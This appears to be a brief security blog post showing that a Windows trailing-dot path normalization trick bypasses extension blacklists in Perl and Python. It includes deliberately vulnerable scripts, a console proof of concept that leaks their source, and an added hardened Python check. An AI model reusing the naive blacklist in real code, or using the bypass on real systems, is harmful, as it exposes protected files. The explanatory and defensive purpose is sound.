A month ago the Italian security group USH released a very interesting article, "PHP filesystem attack vectors", which described two new types of attacks on PHP. One of these attacks, the path normalization attack, may for example allow an attacker to bypass the filter of a file viewer that blacklists certain file extensions.
But the path normalization attack is not limited to PHP scripts. I wrote two example scripts, in Perl and Python:
test.pl code:
#!/usr/bin/perl
use warnings;
my $file = shift;
if ( substr($file, -3) eq '.pl' ) {
    print 'shit!';
} else {
    open(F, "<$file");
    print while <F>;
}
test.py code:
#!/usr/bin/env python
import sys
file = sys.argv[1]
if file.endswith(".py"):
    print("shit!")
else:
    print(open(file).read())
PoC:
C:\Users\User\Desktop>perl test.pl test.pl
shit!
C:\Users\User\Desktop>perl test.pl test.pl.
#!/usr/bin/perl
use warnings;
my $file = shift;
if ( substr($file, -3) eq '.pl' ) {
    print 'shit!';
} else {
    open(F, "<$file");
    print while <F>;
}
C:\Users\User\Desktop>python test.py test.py
shit!
C:\Users\User\Desktop>python test.py test.py.
#!/usr/bin/env python
import sys
file = sys.argv[1]
if file.endswith(".py"):
    print("shit!")
else:
    print(open(file).read())
C:\Users\User\Desktop>
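The trailing dot works because the Win32 path layer drops trailing dots and spaces from the final path component before the file is opened, so test.py. opens test.py while the script's string comparison still sees a name ending in a dot. The following is an added example, not part of the original post: a Python sketch that runs the extension check against the name Windows would actually open. The function names and the blocked-extension set are assumptions made for illustration.

```python
import ntpath

# Constructed blacklist mirroring the two scripts above (assumption).
BLOCKED_EXTENSIONS = {".py", ".pl"}


def naive_is_blocked(name):
    """The check used by test.py / test.pl: compare the raw string suffix."""
    return any(name.endswith(ext) for ext in BLOCKED_EXTENSIONS)


def win32_effective_name(path):
    """Approximate the final component that Windows opens.

    Trailing dots and spaces are dropped by Win32 path normalization and
    the filesystem is case-insensitive, so fold both before comparing.
    ntpath is used so the result is the same on any host OS.
    """
    base = ntpath.basename(path)
    return base.rstrip(". ").lower()


def hardened_is_blocked(path):
    """Apply the blacklist to the normalized name; refuse empty names."""
    name = win32_effective_name(path)
    if not name:
        return True  # nothing left after normalization: deny by default
    return ntpath.splitext(name)[1] in BLOCKED_EXTENSIONS


def compare(names):
    """Return (name, naive verdict, hardened verdict) for each input."""
    return [(n, naive_is_blocked(n), hardened_is_blocked(n)) for n in names]


if __name__ == "__main__":
    # Constructed sample inputs, including the one from the PoC above.
    samples = ["test.py", "test.py.", "test.pl..", "TEST.PY", "notes.txt"]
    for name, naive, hardened in compare(samples):
        print(f"{name!r:14} naive_blocked={naive!s:5} hardened_blocked={hardened}")
```

An allowlist of permitted extensions, checked on the normalized name, is the stricter variant of the same idea.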